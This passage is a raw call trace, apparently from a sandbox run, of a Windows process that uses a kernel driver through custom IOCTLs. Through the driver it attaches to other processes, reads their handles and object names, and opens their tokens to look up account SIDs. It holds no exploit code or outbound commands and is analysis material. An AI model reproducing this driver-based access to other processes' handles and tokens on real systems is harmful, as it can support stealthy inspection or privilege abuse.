nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0149.623] PsLookupProcessByProcessId (in: ProcessId=0x564, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.623] PsAcquireProcessExitSynchronization () returned 0x0 [0149.623] KeStackAttachProcess (in: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880051635d0) [0149.623] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002028c20, HandleInformation=0x0) returned 0x0 [0149.624] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.624] PsReleaseProcessExitSynchronization () returned 0x2 [0149.624] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x12 [0149.624] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a1044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.624] ObfDereferenceObject (Object=0xfffffa8002028c20) returned 0x1 [0149.624] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.624] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.624] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.624] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0149.624] PsLookupProcessByProcessId (in: ProcessId=0x564, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.624] PsAcquireProcessExitSynchronization () returned 0x0 [0149.624] KeStackAttachProcess (in: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002026b30, ApcState=0xfffff880051635d0) [0149.625] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0149.625] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.625] PsReleaseProcessExitSynchronization () returned 0x2 [0149.625] ObfDereferenceObject (Object=0xfffffa8002026b30) returned 0x12 [0149.625] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030a2044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a2044, ReturnLength=0xfffff88005163550) returned 0x0 [0149.625] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0149.625] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.625] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.625] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xc8 [0149.626] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0149.626] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800202ea70, HandleInformation=0x0) returned 0x0 [0149.626] ObOpenObjectByPointer (in: Object=0xfffffa800202ea70, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0149.626] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x14 [0149.626] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80021731c0 | out: TokenHandle=0xfffffa80021731c0*=0xc4) returned 0x0 [0149.626] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0149.626] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.626] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0149.627] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0149.629] CloseHandle (hObject=0xc4) returned 1 [0149.629] CloseHandle (hObject=0xc8) returned 1 [0149.629] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.629] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0149.630] PsLookupProcessByProcessId (in: ProcessId=0x560, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.630] PsAcquireProcessExitSynchronization () returned 0x0 [0149.630] KeStackAttachProcess (in: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880051635d0) [0149.630] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002031700, HandleInformation=0x0) returned 0x0 [0149.630] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.630] PsReleaseProcessExitSynchronization () returned 0x2 [0149.630] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x12 [0149.630] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a3044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.630] ObfDereferenceObject (Object=0xfffffa8002031700) returned 0x1 [0149.630] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.631] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.631] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.631] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0149.631] PsLookupProcessByProcessId (in: ProcessId=0x560, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.631] PsAcquireProcessExitSynchronization () returned 0x0 [0149.631] KeStackAttachProcess (in: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880051635d0) [0149.631] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002028200, HandleInformation=0x0) returned 0x0 [0149.631] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.631] PsReleaseProcessExitSynchronization () returned 0x2 [0149.631] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x12 [0149.631] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a4044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.632] ObfDereferenceObject (Object=0xfffffa8002028200) returned 0x1 [0149.632] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.632] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.632] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.632] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0149.632] PsLookupProcessByProcessId (in: ProcessId=0x560, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.632] PsAcquireProcessExitSynchronization () returned 0x0 [0149.632] KeStackAttachProcess (in: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800202ea70, ApcState=0xfffff880051635d0) [0149.632] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0149.632] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.632] PsReleaseProcessExitSynchronization () returned 0x2 [0149.633] ObfDereferenceObject (Object=0xfffffa800202ea70) returned 0x12 [0149.633] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030a5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a5044, ReturnLength=0xfffff88005163550) returned 0x0 [0149.633] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0149.633] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.633] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.633] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0xc8 [0149.633] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0149.633] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002034370, HandleInformation=0x0) returned 0x0 [0149.634] ObOpenObjectByPointer (in: Object=0xfffffa8002034370, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0149.634] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x14 [0149.634] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80021731c0 | out: TokenHandle=0xfffffa80021731c0*=0xc4) returned 0x0 [0149.634] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0149.634] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.634] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0149.634] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0149.637] CloseHandle (hObject=0xc4) returned 1 [0149.637] CloseHandle (hObject=0xc8) returned 1 [0149.637] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.638] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0149.638] PsLookupProcessByProcessId (in: ProcessId=0x23c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.638] PsAcquireProcessExitSynchronization () returned 0x0 [0149.638] KeStackAttachProcess (in: PROCESS=0xfffffa8002034370, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002034370, ApcState=0xfffff880051635d0) [0149.638] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800203a8f0, HandleInformation=0x0) returned 0x0 [0149.638] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.638] PsReleaseProcessExitSynchronization () returned 0x2 [0149.638] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x12 [0149.638] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a6044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.638] ObfDereferenceObject (Object=0xfffffa800203a8f0) returned 0x1 [0149.639] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.639] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.639] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.639] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0149.639] PsLookupProcessByProcessId (in: ProcessId=0x23c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.639] PsAcquireProcessExitSynchronization () returned 0x0 [0149.639] KeStackAttachProcess (in: PROCESS=0xfffffa8002034370, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002034370, ApcState=0xfffff880051635d0) [0149.639] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800203fc10, HandleInformation=0x0) returned 0x0 [0149.639] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.639] PsReleaseProcessExitSynchronization () returned 0x2 [0149.640] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x12 [0149.640] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030a7044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030a7044, ReturnLength=0xfffff88005163508) returned 0x0 [0149.640] ObfDereferenceObject (Object=0xfffffa800203fc10) returned 0x1 [0149.640] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.640] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.640] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0149.640] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0149.640] PsLookupProcessByProcessId (in: ProcessId=0x23c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0149.640] PsAcquireProcessExitSynchronization () returned 0x0 [0149.640] KeStackAttachProcess (in: PROCESS=0xfffffa8002034370, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002034370, ApcState=0xfffff880051635d0) [0149.641] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0149.641] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0149.641] PsReleaseProcessExitSynchronization () returned 0x2 [0149.641] ObfDereferenceObject (Object=0xfffffa8002034370) returned 0x12 [0149.641] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030a8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030a8044, ReturnLength=0xfffff88005163550) returned 0x0 [0149.641] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0149.641] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.641] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0149.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c0) returned 0xc8 [0149.641] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0149.642] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800203a060, HandleInformation=0x0) returned 0x0 [0149.642] ObOpenObjectByPointer (in: Object=0xfffffa800203a060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0149.642] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x14 [0149.642] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80021731c0 | out: TokenHandle=0xfffffa80021731c0*=0xc4) returned 0x0 [0149.642] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0149.642] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0149.642] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0149.642] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0151.823] CloseHandle (hObject=0xc4) returned 1 [0151.823] CloseHandle (hObject=0xc8) returned 1 [0151.823] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.823] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0151.824] PsLookupProcessByProcessId (in: ProcessId=0x1c0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.824] PsAcquireProcessExitSynchronization () returned 0x0 [0151.824] KeStackAttachProcess (in: PROCESS=0xfffffa800203a060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800203a060, ApcState=0xfffff880051635d0) [0151.824] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800203c3c0, HandleInformation=0x0) returned 0x0 [0151.824] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.824] PsReleaseProcessExitSynchronization () returned 0x2 [0151.824] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x12 [0151.824] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002f29044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002f29044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.824] ObfDereferenceObject (Object=0xfffffa800203c3c0) returned 0x1 [0151.824] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.824] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.825] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.825] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0151.825] PsLookupProcessByProcessId (in: ProcessId=0x1c0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.825] PsAcquireProcessExitSynchronization () returned 0x0 [0151.825] KeStackAttachProcess (in: PROCESS=0xfffffa800203a060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800203a060, ApcState=0xfffff880051635d0) [0151.825] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800203c270, HandleInformation=0x0) returned 0x0 [0151.825] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.825] PsReleaseProcessExitSynchronization () returned 0x2 [0151.825] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x12 [0151.825] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd1044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd1044, ReturnLength=0xfffff88005163508) returned 0x0 [0151.825] ObfDereferenceObject (Object=0xfffffa800203c270) returned 0x1 [0151.825] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.825] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.825] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0151.825] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0151.825] PsLookupProcessByProcessId (in: ProcessId=0x1c0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0151.826] PsAcquireProcessExitSynchronization () returned 0x0 [0151.826] KeStackAttachProcess (in: PROCESS=0xfffffa800203a060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800203a060, ApcState=0xfffff880051635d0) [0151.826] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0151.826] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0151.826] PsReleaseProcessExitSynchronization () returned 0x2 [0151.826] ObfDereferenceObject (Object=0xfffffa800203a060) returned 0x12 [0151.826] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ff1044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ff1044, ReturnLength=0xfffff88005163550) returned 0x0 [0151.826] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x52 [0151.826] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0151.826] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0151.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7c8) returned 0xc8 [0151.826] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0151.826] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002059b30, HandleInformation=0x0) returned 0x0 [0151.826] ObOpenObjectByPointer (in: Object=0xfffffa8002059b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0151.827] ObfDereferenceObject (Object=0xfffffa8002059b30) returned 0x14 [0151.827] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa8002669100 | out: TokenHandle=0xfffffa8002669100*=0xc4) returned 0x0 [0151.827] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0151.827] 